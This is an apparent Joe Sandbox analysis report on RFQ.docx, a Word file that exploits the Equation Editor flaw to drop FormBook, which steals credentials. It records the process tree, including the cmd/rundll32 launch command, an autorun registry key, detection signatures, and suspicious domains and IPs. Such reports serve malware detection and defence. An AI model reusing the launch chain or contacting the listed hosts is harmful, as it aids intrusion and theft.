Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ.docx

Overview

General Information

Sample name:RFQ.docx
Analysis ID:1553493
MD5:933dd0e0dd85baf5ac3c57fda0731637
SHA1:a37b19652dcd96f996c94bb44d9ba059b4cf9802
SHA256:cf5b221d161fbe82fd8cecb463d515b8469fc9dd05073eb3c3135b9823f571b0
Tags:docxuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Creates an undocumented autostart registry key
Document contains OLE streams with names of living off the land binaries
Document exploit detected (process start blacklist hit)
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office process drops PE file
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: ImagingDevices Unusual Parent/Child Processes
Sigma detected: Potential PowerShell Execution Via DLL
Sigma detected: Suspicious Microsoft Office Child Process
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches the installation path of Mozilla Firefox
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 3328 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3408 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • cmd.exe (PID: 3456 cmdline: CmD.exe /C rundll32 %tmp%\xwizard.,IEX A C MD5: AD7B9C14083B52BC532FBA5948342B98)
        • rundll32.exe (PID: 3480 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C MD5: 51138BEEA3E2C21EC44D0932C71762A8)
          • rundll32.exe (PID: 3488 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C MD5: DD81D91FF3B0763C392422865C9AC12E)
            • ImagingDevices.exe (PID: 3620 cmdline: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe" MD5: 44131EEA626ABDBEF6631F72C007FC0E)
              • mVjlVtpvDsvJ.exe (PID: 1780 cmdline: "C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                • convert.exe (PID: 3704 cmdline: "C:\Windows\SysWOW64\convert.exe" MD5: FA5C490197C97EC58CF751F8CE6439D3)
                  • mVjlVtpvDsvJ.exe (PID: 2184 cmdline: "C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                  • firefox.exe (PID: 3992 cmdline: "C:\Program Files (x86)\Mozilla Firefox\Firefox.exe" MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmpEXP_potential_CVE_2017_11882unknownReversingLabs
  • 0x0:$docfilemagic: D0 CF 11 E0 A1 B1 1A E1
  • 0xbc300:$equation1: Equation Native
  • 0xbca80:$equation1: Equation Native
  • 0x920:$equation2: Microsoft Equation 3.0
  • 0xbc720:$equation2: Microsoft Equation 3.0
  • 0xba019:$http: http://
  • 0xba043:$http: http://
  • 0xba085:$http: http://
  • 0xba4f6:$http: http://
  • 0xba51b:$http: http://
  • 0xba557:$http: http://
  • 0xba5a0:$http: http://
  • 0xbaae8:$http: http://
  • 0xbab0e:$http: http://
  • 0xbab58:$http: http://
  • 0xbb08f:$http: http://
  • 0xbb0b5:$http: http://
  • 0xbb0fd:$http: http://
  • 0xbb735:$http: http://
  • 0xbb79f:$http: http://
  • 0xbb7c5:$http: http://

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.648541156.00000000007F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000009.00000002.497403170.00000000001E0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000B.00000002.648550804.0000000000840000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000C.00000002.648430732.00000000008F0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            9.2.ImagingDevices.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: ImagingDevices Unusual Parent/Child Processes
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe" , CommandLine: "C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe" , CommandLine|base64offset|contains: )^, Image: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe, NewProcessName: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe, OriginalFileName: C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe, ParentCommandLine: "C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe", ParentImage: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe, ParentProcessId: 3620, ParentProcessName: ImagingDevices.exe, ProcessCommandLine: "C:\Program Files (x86)\EybfpbEOZHtuUtUXqGgdkJfqlFBaXceXsGupOhBfyJwaYcBXSg\mVjlVtpvDsvJ.exe" , ProcessId: 1780, ProcessName: mVjlVtpvDsvJ.exe
              Sigma detected: Potential PowerShell Execution Via DLL
              Source: Process startedAuthor: Markus Neis, Nasreddine Bencherchali: Data: Command: rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C, CommandLine: rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C, CommandLine|base64offset|contains: ], Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: CmD.exe /C rundll32 %tmp%\xwizard.,IEX A C, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 3456, ParentProcessName: cmd.exe, ProcessCommandLine: rundll32 C:\Users\user\AppData\Local\Temp\xwizard.,IEX A C, ProcessId: 3480, ProcessName: rundll32.exe
              Sigma detected: Suspicious Microsoft Office Child Process
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: CmD.exe /C rundll32 %tmp%\xwizard.,IEX A C, CommandLine: CmD.exe /C rundll32 %tmp%\xwizard.,IEX A C, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3408, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: CmD.exe /C rundll32 %tmp%\xwizard.,IEX A C, ProcessId: 3456, ProcessName: cmd.exe
              Sigma detected: CurrentVersion Autorun Keys Modification
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\Windows Photo Viewer\ImagingDevices.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\convert.exe, ProcessId: 3704, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ANPPAN
              Sigma detected: Modification of IE Registry Settings
              Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\convert.exe, ProcessId: 3704, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
              Sigma detected: Office Macro File Creation
              Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3328, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

              Suricata Signatures

              No Suricata rule has matched

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\wcC8DC.tmpAvira: detection malicious, Label: TR/Crypt.ZPACK.Gen
              Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
              Multi AV Scanner detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\wcC8DC.tmpReversingLabs: Detection: 68%
              Source: C:\Users\user\AppData\Local\Temp\xwizardReversingLabs: Detection: 23%
              Multi AV Scanner detection for submitted file
              Source: RFQ.docxReversingLabs: Detection: 15%
              Yara detected FormBook
              Source: Yara matchFile source: 9.2.ImagingDevices.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000B.00000002.648541156.00000000007F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497403170.00000000001E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497434362.0000000000401000.00000040.00000001.01000000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.648550804.0000000000840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.648430732.00000000008F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000011.00000002.553330249.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000B.00000002.648308986.0000000000100000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000A.00000002.648511553.00000000043C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.497567649.0000000002200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Machine Learning detection for dropped file
              Source: C:\Users\user\AppData\Local\Temp\wcC8DC.tmpJoe Sandbox ML: detected

              Exploits

              barindex
              Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exe
              Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
              Source: ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drStream path '_1792802952/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: ~WRF{AAAEB295-BE41-468F-A84A-4A342AF27793}.tmp.1.drStream path '_1792802956/\x1CompObj' : ...................F....Microsoft Equation 3.0....
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: unknownHTTPS traffic detected: 153.121.40.91:443 -> 192.168.2.22:49161 version: TLS 1.2
              Source: Binary string: ImagingDevices.pdb source: convert.exe, 0000000B.00000002.648888514.000000000287C000.00000004.10000000.00040000.00000000.sdmp, convert.exe, 0000000B.00000002.648352209.0000000000200000.00000004.00000020.00020000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000000.510314863.000000000329C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.553400989.000000000126C000.00000004.80000000.00040000.00000000.sdmp
              Source: Binary string: convert.pdb source: ImagingDevices.exe, 00000009.00000002.497445868.00000000005F4000.00000004.00000020.00020000.00000000.sdmp, mVjlVtpvDsvJ.exe, 0000000A.00000002.648365477.0000000000744000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: mVjlVtpvDsvJ.exe, 0000000A.00000002.648477658.000000000126E000.00000002.00000001.01000000.00000004.sdmp, mVjlVtpvDsvJ.exe, 0000000C.00000002.648546360.000000000126E000.00000002.00000001.01000000.00000004.sdmp
              Source: Binary string: wntdll.pdb source: ImagingDevices.exe, ImagingDevices.exe, 00000009.00000003.476693111.0000000000450000.00000004.00000020.00020000.00000000.sdmp, ImagingDevices.exe, 00000009.00000002.497469157.00000000009F0000.00000040.00001000.00020000.00000000.sdmp, ImagingDevices.exe, 00000009.00000002.497469157.0000000000870000.00000040.00001000.00020000.00000000.sdmp, ImagingDevices.exe, 00000009.00000003.477063073.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648597761.0000000001FD0000.00000040.00001000.00020000.00000000.sdmp, convert.exe, 0000000B.00000003.497780980.0000000001E40000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000003.497414077.00000000007F0000.00000004.00000020.00020000.00000000.sdmp, convert.exe, 0000000B.00000002.648597761.0000000002150000.00000040.00001000.00020000.00000000.sdmp

              Software Vulnerabilities

              barindex
              Document exploit detected (drops PE files)
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: xwizard.1.drJump to dropped file
              Document exploit detected (process start blacklist hit)
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
              Source: global trafficDNS query: name: www.diced.jp
              Source: global trafficDNS query: name: www.diced.jp
              Source: global trafficDNS query: name: www.d63dm.top
              Source: global trafficDNS query: name: www.sqlite.org
              Source: global trafficDNS query: name: www.danceonwater.net
              Source: global trafficDNS query: name: www.foshape.top
              Source: global trafficDNS query: name: www.swiftbyrte.xyz
              Source: global trafficDNS query: name: www.maryneedskidneys.info
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 154.23.184.218:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49167 -> 208.91.197.27:80
              Source: global trafficTCP traffic: 192.168.2.22:49171 -> 206.238.184.166:80
              Source: global trafficTCP traffic: 192.168.2.22:49175 -> 209.74.64.59:80
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
